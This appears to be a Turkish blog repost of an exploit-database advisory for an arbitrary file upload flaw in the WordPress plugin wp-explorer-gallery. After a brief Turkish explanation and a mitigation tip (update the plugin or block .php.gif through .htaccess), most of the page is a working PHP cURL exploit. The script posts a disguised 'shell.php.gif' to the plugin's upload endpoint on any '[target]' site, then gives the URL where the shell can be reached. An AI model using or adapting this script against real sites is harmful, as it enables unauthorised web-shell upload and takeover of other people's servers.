WordPress plugins wp-explorer-gallery Arbitrary File Upload Vulnerability

WordPress plugins wp-explorer-gallery Arbitrary File Upload upload açığı bulunmuş olup, php.gif uzantılı olarak upload edilmekte, servere ulaşılarık çeşitli exploitler, scriptler, zararlı yazılımlar çalıştırma imkanı vermektedir.
Tüm wordpress upload açıklarında olduğu gibi bu açıktada, eklentinin yeni sürümü wordpress sitesinden indirilerek güncellemeli veya .htaccess kodu oluşturularık php ve php.gif gibi uzantılar engellenmelidir.

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm Zikou-16 member from Inj3ct0r Team                 1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
 
-----------------------------------------------------------------------
Wordpress plugins  -  wp-explorer-gallery Arbitrary File Upload Vulnerability
-----------------------------------------------------------------------
 
#####
# Author => Zikou-16
# E-mail => zikou16x@gmail.com
# Facebook => http://fb.me/Zikou.se
# Google Dork => nO x)
# Tested on : Windows 7 , Backtrack 5r3
# Download plugin : http://xmlswf.com/images/stories/WP_plugins/wp-explorer-gallery.zip
####
 
#=> Exploit Info :
------------------
# The attacker can uplaod file/shell.php.gif
# ("jpg", "gif", "png")  // Allowed file extensions
# "/uploads/";  // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-';     // Characters allowed in the file name (in a Regular Expression format)
------------------
 
-----------
#=> Exploit 
-----------
<?php
 
$uploadfile="zik.php.gif";
$ch = curl_init("http://[target]/[path]/wp-content/plugins/wp-explorer-gallery/js/swfupload/js/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
'folder'=>'/wp-content/uploads//'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
 
print "$postResult";
?> 
 
Shell Access : http://[target]/[path]/wp-content/uploads/random_name.php.gif
 
<?php
phpinfo();
?>
 
------------------------------

Bir cevap yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir